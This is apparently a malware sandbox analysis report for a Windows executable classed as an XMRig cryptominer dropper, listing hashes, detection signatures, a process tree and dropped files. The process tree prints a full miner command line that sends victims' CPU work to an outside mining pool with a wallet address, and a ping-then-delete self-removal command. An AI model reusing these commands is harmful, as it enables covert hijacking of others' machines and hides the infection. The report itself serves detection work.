Overview

overview

10

Static

static

10

3c709f77cb...82.exe

windows7_x64

10

3c709f77cb...82.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    152s
  • max time network
    160s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    03-07-2022 07:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3c709f77cbe8943f2bcfb75b2231f37cf0f9aa080aa5f2fb477b684416c6c782.exe

  • Size

    1.1MB

  • MD5

    c1d6cef4cf9fd0ad81e1fff789b01cb9

  • SHA1

    759ec4183a156ce1eb6a9d6605335e07f579114e

  • SHA256

    3c709f77cbe8943f2bcfb75b2231f37cf0f9aa080aa5f2fb477b684416c6c782

  • SHA512

    dbc6501fac45b7c04837e55a061c58745f25e957315f1e793493f9fd6f7dd333b9e5d74f2b2b6ae1eb3575790577966aa865bafb80847cfd21e992d9a585791e

Score
10/10
xmrigaspackv2miner

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Detected Stratum cryptominer command 1 IoCs

    Looks to be attempting to contact Stratum mining pool.

    miner
  • XMRig Miner Payload 9 IoCs
    miner
  • ASPack v2.12-2.42 4 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 8 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c709f77cbe8943f2bcfb75b2231f37cf0f9aa080aa5f2fb477b684416c6c782.exe
    "C:\Users\Admin\AppData\Local\Temp\3c709f77cbe8943f2bcfb75b2231f37cf0f9aa080aa5f2fb477b684416c6c782.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4316
    • C:\Users\Admin\AppData\Local\Temp\HmaPfu.exe
      C:\Users\Admin\AppData\Local\Temp\HmaPfu.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:3412
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5c9b63f5.bat" "
        3⤵
          PID:2268
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c @ping -n 5 127.0.0.1&del C:\Users\Admin\AppData\Local\Temp\3C709F~1.EXE > nul
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3404
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 5 127.0.0.1
          3⤵
          • Runs ping.exe
          PID:548
    • C:\ProgramData\National\loader_xmr.exe
      C:\ProgramData\National\loader_xmr.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3868
      • C:\Windows\TEMP\HmaPfu.exe
        C:\Windows\TEMP\HmaPfu.exe
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Program Files directory
        • Modifies data under HKEY_USERS
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\5c9b63f5.bat" "
          3⤵
            PID:2084
        • C:\ProgramData\Microsoft\National\xmrig.exe
          C:\ProgramData\Microsoft\National\xmrig.exe -o stratum+tcp://xmr.crypto-pool.fr:80 -u 48ihXYmNKMUCdz7C5e5KB47FWxf9W6ruEYbhXHZ8qVff71WJ8TAZWCdM1rLUBpVWBdEzTYJbNt4URDm9M6mdbrvoToBSJA9 -p x -k --max-cpu-usage=80
          2⤵
          • Detected Stratum cryptominer command
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:1380
      • C:\Windows\system32\wbem\unsecapp.exe
        C:\Windows\system32\wbem\unsecapp.exe -Embedding
        1⤵
          PID:996

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Remote System Discovery

        1
        T1018

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\7-Zip\Uninstall.exe
          Filesize

          31KB

          MD5

          3fabc5d4364b489eb8d6862486fbcdde

          SHA1

          7c2c211f20852ba09e0a4b869a5600ef46b0de89

          SHA256

          e418cdd828947681115e4a9904f298e3e76c7a803af4c818244599dd2fd1672a

          SHA512

          f001039396d3b3814d8d3bfcfa04d14d267ea631d4ba62340300fe4c64fff23a3e5a2043f5bca2500481c103f560002c9d116d5dc2be1aab67dfd209f97ae013

          Download Submit
        • C:\ProgramData\Microsoft\National\xmrig.exe
          Filesize

          467KB

          MD5

          3fe786058a5e426c151ac71566f504ae

          SHA1

          76a8fe2f276a8fe174559fe24250093adb8619db

          SHA256

          77255adc0910dc376f87f4db05849dc8a20c9e87ab181cf2ff513fc718c869bd

          SHA512

          5e387b659c007ac8179375c9b2ce35b8413100394ebb3773962a33e1ac9de228b128d713417aa1138b3cbef5f3a5b79a6b11f888495519bbe46bddac78ed1a7c

          Download Submit
        • C:\ProgramData\Microsoft\National\xmrig.exe
          Filesize

          467KB

          MD5

          3fe786058a5e426c151ac71566f504ae

          SHA1

          76a8fe2f276a8fe174559fe24250093adb8619db

          SHA256

          77255adc0910dc376f87f4db05849dc8a20c9e87ab181cf2ff513fc718c869bd

          SHA512

          5e387b659c007ac8179375c9b2ce35b8413100394ebb3773962a33e1ac9de228b128d713417aa1138b3cbef5f3a5b79a6b11f888495519bbe46bddac78ed1a7c

          Download Submit
        • C:\ProgramData\National\loader_xmr.exe
          Filesize

          1.1MB

          MD5

          c1d6cef4cf9fd0ad81e1fff789b01cb9

          SHA1

          759ec4183a156ce1eb6a9d6605335e07f579114e

          SHA256

          3c709f77cbe8943f2bcfb75b2231f37cf0f9aa080aa5f2fb477b684416c6c782

          SHA512

          dbc6501fac45b7c04837e55a061c58745f25e957315f1e793493f9fd6f7dd333b9e5d74f2b2b6ae1eb3575790577966aa865bafb80847cfd21e992d9a585791e

          Download Submit
        • C:\ProgramData\National\loader_xmr.exe
          Filesize

          1.1MB

          MD5

          c1d6cef4cf9fd0ad81e1fff789b01cb9

          SHA1

          759ec4183a156ce1eb6a9d6605335e07f579114e

          SHA256

          3c709f77cbe8943f2bcfb75b2231f37cf0f9aa080aa5f2fb477b684416c6c782

          SHA512

          dbc6501fac45b7c04837e55a061c58745f25e957315f1e793493f9fd6f7dd333b9e5d74f2b2b6ae1eb3575790577966aa865bafb80847cfd21e992d9a585791e

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\5c9b63f5.bat
          Filesize

          187B

          MD5

          aeecfc42bd809afe233c6d5fc078ca47

          SHA1

          42459b1c6dece9a0330e6293b64caa5ca6dc1e43

          SHA256

          70e95ed72d0f830d647d10c80c992770f87ff9392f6c00724b1bbd36ffae4edb

          SHA512

          009026253179361c0b223a8cc1f618510959dd945128487777bff55b920ecb6dcdfc27ceeeb32e6ce2f2638874af93de67bfd2738cdfebb01dd1bdbb9e588b3a

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\HmaPfu.exe
          Filesize

          15KB

          MD5

          56b2c3810dba2e939a8bb9fa36d3cf96

          SHA1

          99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

          SHA256

          4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

          SHA512

          27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\HmaPfu.exe
          Filesize

          15KB

          MD5

          56b2c3810dba2e939a8bb9fa36d3cf96

          SHA1

          99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

          SHA256

          4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

          SHA512

          27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

          Download Submit
        • C:\Windows\TEMP\5c9b63f5.bat
          Filesize

          133B

          MD5

          ab08ce1eb37db94cfe7f54d5b0d667cd

          SHA1

          69ee712c49a51bcffc414c0cb19810dea3d4ea59

          SHA256

          cf09b04f40c9e7f32fec0715926071613d2a20f6a67e7673ebc3e1199d07c77c

          SHA512

          cf0af7fd519b25e27a3d59dbad415b489c39502a32ef4f4aa55edb3b3a69d19effd79c5feb71462c8e171d29d99d373a4b9265a51f484c6bde7d7f48587aa699

          Download Submit
        • C:\Windows\TEMP\HmaPfu.exe
          Filesize

          15KB

          MD5

          56b2c3810dba2e939a8bb9fa36d3cf96

          SHA1

          99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

          SHA256

          4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

          SHA512

          27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

          Download Submit
        • C:\Windows\Temp\HmaPfu.exe
          Filesize

          15KB

          MD5

          56b2c3810dba2e939a8bb9fa36d3cf96

          SHA1

          99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

          SHA256

          4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

          SHA512

          27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

          Download Submit
        • memory/548-145-0x0000000000000000-mapping.dmp
          Download
        • memory/1380-147-0x0000000000000000-mapping.dmp
          Download
        • memory/2084-152-0x0000000000000000-mapping.dmp
          Download
        • memory/2268-151-0x0000000000000000-mapping.dmp
          Download
        • memory/3404-144-0x0000000000000000-mapping.dmp
          Download
        • memory/3412-134-0x0000000000940000-0x0000000000949000-memory.dmp
          Filesize

          36KB

          Download
        • memory/3412-131-0x0000000000000000-mapping.dmp
          Download
        • memory/3412-153-0x0000000000940000-0x0000000000949000-memory.dmp
          Filesize

          36KB

          Download
        • memory/3868-150-0x00000000000E0000-0x0000000000205000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/3868-142-0x00000000000E0000-0x0000000000205000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/4044-143-0x0000000000140000-0x0000000000149000-memory.dmp
          Filesize

          36KB

          Download
        • memory/4044-138-0x0000000000000000-mapping.dmp
          Download
        • memory/4044-154-0x0000000000140000-0x0000000000149000-memory.dmp
          Filesize

          36KB

          Download
        • memory/4316-146-0x0000000000680000-0x00000000007A5000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/4316-130-0x0000000000680000-0x00000000007A5000-memory.dmp
          Filesize

          1.1MB

          Download
        • memory/4316-135-0x0000000000680000-0x00000000007A5000-memory.dmp
          Filesize

          1.1MB

          Download